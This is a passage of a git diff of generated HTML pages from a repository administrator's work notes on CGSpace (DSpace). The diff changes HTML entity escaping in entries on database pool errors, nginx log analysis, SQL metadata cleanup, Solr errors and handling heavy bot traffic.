<li>And indeed the Catalina logs show that it failed to set up the JDBC driver:</li>
</ul>
<pre tabindex="0"><code>org.apache.tomcat.dbcp.dbcp.SQLNestedException: Cannot load JDBC driver class 'org.postgresql.Driver'
<pre tabindex="0"><code>org.apache.tomcat.dbcp.dbcp.SQLNestedException: Cannot load JDBC driver class &#39;org.postgresql.Driver&#39;
</code></pre><ul>
<li>There are several copies of the PostgreSQL driver installed by DSpace:</li>
</ul>
<pre tabindex="0"><code>$ find ~/dspace/ -iname &quot;postgresql*jdbc*.jar&quot;
<pre tabindex="0"><code>$ find ~/dspace/ -iname &#34;postgresql*jdbc*.jar&#34;
/Users/aorth/dspace/webapps/jspui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
/Users/aorth/dspace/webapps/oai/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
/Users/aorth/dspace/webapps/xmlui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
@ -561,8 +561,8 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
<li>Oh that&rsquo;s fantastic, now at least Tomcat doesn&rsquo;t print an error during startup so I guess it succeeds to create the JNDI pool</li>
<li>DSpace starts up but I have no idea if it&rsquo;s using the JNDI configuration because I see this in the logs:</li>
</ul>
<pre tabindex="0"><code>2017-12-19 13:26:54,271 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS is '{}'PostgreSQL
2017-12-19 13:26:54,277 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS driver version is '{}'9.5.10
<pre tabindex="0"><code>2017-12-19 13:26:54,271 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS is &#39;{}&#39;PostgreSQL
2017-12-19 13:26:54,277 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS driver version is &#39;{}&#39;9.5.10
2017-12-19 13:26:54,293 INFO org.dspace.storage.rdbms.DatabaseUtils @ Loading Flyway DB migrations from: filesystem:/Users/aorth/dspace/etc/postgres, classpath:org.dspace.storage.rdbms.sqlmigration.postgres, classpath:org.dspace.storage.rdbms.migration
2017-12-19 13:26:54,306 INFO org.flywaydb.core.internal.dbsupport.DbSupportFactory @ Database: jdbc:postgresql://localhost:5432/dspacetest (PostgreSQL 9.5)
</code></pre><ul>
@ -669,7 +669,7 @@ javax.naming.NoInitialContextException: Need to specify class name in environmen
<li>There are short bursts of connections up to 10, but it generally stays around 5</li>
<li>Test and import 13 records to CGSpace for Abenet:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchiveFormat -m systemoffice.map &amp;&gt; systemoffice.log
</code></pre><ul>
<li>The fucking database went from 47 to 72 to 121 connections while I was importing so it stalled.</li>
@ -687,7 +687,7 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
<li>Linode alerted that CGSpace was using high CPU this morning around 6 AM</li>
<li>I&rsquo;m playing with reading all of a month&rsquo;s nginx logs into goaccess:</li>
</ul>
<pre tabindex="0"><code># find /var/log/nginx -type f -newermt &quot;2017-12-01&quot; | xargs zcat --force | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># find /var/log/nginx -type f -newermt &#34;2017-12-01&#34; | xargs zcat --force | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>I can see interesting things using this approach, for example:
<ul>
@ -708,23 +708,23 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
<ul>
<li>Looking at some old notes for metadata to clean up, I found a few hundred corrections in <code>cg.fulltextstatus</code> and <code>dc.language.iso</code>:</li>
</ul>
<pre tabindex="0"><code># update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
<pre tabindex="0"><code># update metadatavalue set text_value=&#39;Formally Published&#39; where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;Formally published&#39;;
UPDATE 5
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;NO&#39;;
DELETE 17
# update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
# update metadatavalue set text_value=&#39;en&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(En|English)&#39;;
UPDATE 49
# update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
# update metadatavalue set text_value=&#39;fr&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(fre|frn|French)&#39;;
UPDATE 4
# update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
# update metadatavalue set text_value=&#39;es&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(Spanish|spa)&#39;;
UPDATE 16
# update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
# update metadatavalue set text_value=&#39;vi&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Vietnamese&#39;;
UPDATE 9
# update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
# update metadatavalue set text_value=&#39;ru&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Ru&#39;;
UPDATE 1
# update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
# update metadatavalue set text_value=&#39;in&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(IN|In)&#39;;
UPDATE 5
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(dc.language.iso|CGIAR Challenge Program on Water and Food)&#39;;
DELETE 20
</code></pre><ul>
<li>I need to figure out why we have records with language <code>in</code> because that&rsquo;s not a language!</li>
@ -735,7 +735,7 @@ DELETE 20
<li>Uptime Robot noticed that the server went down for 1 minute a few hours later, around 9AM</li>
<li>Here&rsquo;s the XMLUI logs:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;30/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;30/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
637 207.46.13.106
641 157.55.39.186
715 68.180.229.254
@ -751,7 +751,7 @@ DELETE 20
<li>They identify as &ldquo;com.plumanalytics&rdquo;, which Google says is associated with Elsevier</li>
<li>They only seem to have used one Tomcat session so that&rsquo;s good, I guess I don&rsquo;t need to add them to the Tomcat Crawler Session Manager valve:</li>
</ul>
<pre tabindex="0"><code>$ grep 54.175.208.220 dspace.log.2017-12-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 54.175.208.220 dspace.log.2017-12-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1
</code></pre><ul>
<li>216.244.66.245 seems to be moz.com&rsquo;s DotBot</li>

View File

@ -23,11 +23,11 @@ After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&
I notice this error quite a few times in dspace.log:
2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
And there are many of these errors every day for the past month:
$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -99,11 +99,11 @@ After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&
I notice this error quite a few times in dspace.log:
2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
And there are many of these errors every day for the past month:
$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -150,7 +150,7 @@ dspace.log.2018-01-02:34
Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&rsquo;s Encrypt if it&rsquo;s just a handful of domains
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -252,11 +252,11 @@ Danny wrote to ask for help renewing the wildcard ilri.org certificate and I adv
<li>I notice this error quite a few times in dspace.log:</li>
</ul>
<pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
</code></pre><ul>
<li>And there are many of these errors every day for the past month:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -308,7 +308,7 @@ dspace.log.2018-01-02:34
<li>I woke up to more up and down of CGSpace, this time UptimeRobot noticed a few rounds of up and down of a few minutes each and Linode also notified of high CPU load from 12 to 2 PM</li>
<li>Looks like I need to increase the database pool size again:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-*
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-*
dspace.log.2018-01-01:0
dspace.log.2018-01-02:1972
dspace.log.2018-01-03:1909
@ -319,7 +319,7 @@ dspace.log.2018-01-03:1909
<ul>
<li>The active IPs in XMLUI are:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;3/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;3/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
607 40.77.167.141
611 2a00:23c3:8c94:7800:392c:a491:e796:9c50
663 188.226.169.37
@ -336,12 +336,12 @@ dspace.log.2018-01-03:1909
<li>This appears to be the <a href="https://github.com/internetarchive/heritrix3">Internet Archive&rsquo;s open source bot</a></li>
<li>They seem to be re-using their Tomcat session so I don&rsquo;t need to do anything to them just yet:</li>
</ul>
<pre tabindex="0"><code>$ grep 134.155.96.78 dspace.log.2018-01-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 134.155.96.78 dspace.log.2018-01-03 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2
</code></pre><ul>
<li>The API logs show the normal users:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;3/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;3/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
32 207.46.13.182
38 40.77.167.132
38 68.180.229.254
@ -361,7 +361,7 @@ dspace.log.2018-01-03:1909
</code></pre><ul>
<li>But they come from hundreds of IPs, many of which are 54.x.x.x:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep python-requests | awk '{print $1}' | sort -n | uniq -c | sort -h | tail -n 30
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep python-requests | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail -n 30
9 54.144.87.92
9 54.146.222.143
9 54.146.249.249
@ -402,7 +402,7 @@ dspace.log.2018-01-03:1909
<li>CGSpace went down and up a bunch of times last night and ILRI staff were complaining a lot last night</li>
<li>The XMLUI logs show this activity:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;4/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;4/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
968 197.211.63.81
981 213.55.99.121
1039 66.249.64.93
@ -421,7 +421,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
</code></pre><ul>
<li>So for this week that is the number one problem!</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-*
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-*
dspace.log.2018-01-01:0
dspace.log.2018-01-02:1972
dspace.log.2018-01-03:1909
@ -436,7 +436,7 @@ dspace.log.2018-01-04:1559
<li>Peter said that CGSpace was down last night and Tsega restarted Tomcat</li>
<li>I don&rsquo;t see any alerts from Linode or UptimeRobot, and there are no PostgreSQL connection errors in the dspace logs for today:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-*
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-*
dspace.log.2018-01-01:0
dspace.log.2018-01-02:1972
dspace.log.2018-01-03:1909
@ -446,13 +446,13 @@ dspace.log.2018-01-05:0
<li>Daniel asked for help with their DAGRIS server (linode2328112) that has no disk space</li>
<li>I had a look and there is one Apache 2 log file that is 73GB, with lots of this:</li>
</ul>
<pre tabindex="0"><code>[Fri Jan 05 09:31:22.965398 2018] [:error] [pid 9340] [client 213.55.99.121:64476] WARNING: Unable to find a match for &quot;9-16-1-RV.doc&quot; in &quot;/home/files/journals/6//articles/9/&quot;. Skipping this file., referer: http://dagris.info/reviewtool/index.php/index/install/upgrade
<pre tabindex="0"><code>[Fri Jan 05 09:31:22.965398 2018] [:error] [pid 9340] [client 213.55.99.121:64476] WARNING: Unable to find a match for &#34;9-16-1-RV.doc&#34; in &#34;/home/files/journals/6//articles/9/&#34;. Skipping this file., referer: http://dagris.info/reviewtool/index.php/index/install/upgrade
</code></pre><ul>
<li>I will delete the log file for now and tell Danny</li>
<li>Also, I&rsquo;m still seeing a hundred or so of the &ldquo;ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer&rdquo; errors in dspace logs, I need to search the dspace-tech mailing list to see what the cause is</li>
<li>I will run a full Discovery reindex in the mean time to see if it&rsquo;s something wrong with the Discovery Solr core</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
real 110m43.985s
@ -465,7 +465,7 @@ sys 3m14.890s
<ul>
<li>I&rsquo;m still seeing Solr errors in the DSpace logs even after the full reindex yesterday:</li>
</ul>
<pre tabindex="0"><code>org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1983+TO+1989]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
<pre tabindex="0"><code>org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1983+TO+1989]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
</code></pre><ul>
<li>I posted a message to the dspace-tech mailing list to see if anyone can help</li>
</ul>
@ -474,7 +474,7 @@ sys 3m14.890s
<li>Advise Sisay about blank lines in some IITA records</li>
<li>Generate a list of author affiliations for Peter to clean up:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
COPY 4515
</code></pre><h2 id="2018-01-10">2018-01-10</h2>
<ul>
@ -553,10 +553,10 @@ Caused by: org.apache.http.client.ClientProtocolException
<li>I can apparently search for records in the Solr stats core that have an empty <code>owningColl</code> field using this in the Solr admin query: <code>-owningColl:*</code></li>
<li>On CGSpace I see 48,000,000 records that have an <code>owningColl</code> field and 34,000,000 that don&rsquo;t:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?q=owningColl%3A*&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:48476327,&quot;start&quot;:0,&quot;docs&quot;:[
$ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:34879872,&quot;start&quot;:0,&quot;docs&quot;:[
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?q=owningColl%3A*&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:48476327,&#34;start&#34;:0,&#34;docs&#34;:[
$ http &#39;http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:34879872,&#34;start&#34;:0,&#34;docs&#34;:[
</code></pre><ul>
<li>I tested the <code>dspace stats-util -s</code> process on my local machine and it failed the same way</li>
<li>It doesn&rsquo;t seem to be helpful, but the dspace log shows this:</li>
@ -568,12 +568,12 @@ $ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=js
<li>Uptime Robot said that CGSpace went down at around 9:43 AM</li>
<li>I looked at PostgreSQL&rsquo;s <code>pg_stat_activity</code> table and saw 161 active connections, but no pool errors in the DSpace logs:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-10
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-10
0
</code></pre><ul>
<li>The XMLUI logs show quite a bit of activity today:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &quot;10/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &#34;10/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
951 207.46.13.159
954 157.55.39.123
1217 95.108.181.88
@ -587,18 +587,18 @@ $ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=js
</code></pre><ul>
<li>The user agent for the top six or so IPs are all the same:</li>
</ul>
<pre tabindex="0"><code>&quot;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&quot;
<pre tabindex="0"><code>&#34;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&#34;
</code></pre><ul>
<li><code>whois</code> says they come from <a href="http://www.perfectip.net/">Perfect IP</a></li>
<li>I&rsquo;ve never seen those top IPs before, but they have created 50,000 Tomcat sessions today:</li>
</ul>
<pre tabindex="0"><code>$ grep -E '(2607:fa98:40:9:26b6:fdff:feff:1888|2607:fa98:40:9:26b6:fdff:feff:195d|2607:fa98:40:9:26b6:fdff:feff:1c96|70.36.107.49|70.36.107.190|70.36.107.50)' /home/cgspace.cgiar.org/log/dspace.log.2018-01-10 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep -E &#39;(2607:fa98:40:9:26b6:fdff:feff:1888|2607:fa98:40:9:26b6:fdff:feff:195d|2607:fa98:40:9:26b6:fdff:feff:1c96|70.36.107.49|70.36.107.190|70.36.107.50)&#39; /home/cgspace.cgiar.org/log/dspace.log.2018-01-10 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
49096
</code></pre><ul>
<li>Rather than blocking their IPs, I think I might just add their user agent to the &ldquo;badbots&rdquo; zone with Baidu, because they seem to be the only ones using that user agent:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &quot;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari
/537.36&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &#34;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari
/537.36&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
6796 70.36.107.50
11870 70.36.107.190
17323 70.36.107.49
@ -637,19 +637,19 @@ cache_alignment : 64
<li>Linode rebooted DSpace Test and CGSpace for their host hypervisor kernel updates</li>
<li>Following up with the Solr sharding issue on the dspace-tech mailing list, I noticed this interesting snippet in the Tomcat <code>localhost_access_log</code> at the time of my sharding attempt on my test machine:</li>
</ul>
<pre tabindex="0"><code>127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 107
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-18YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 447
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 76
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 63
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&quot; 200 2137630
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 16253
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp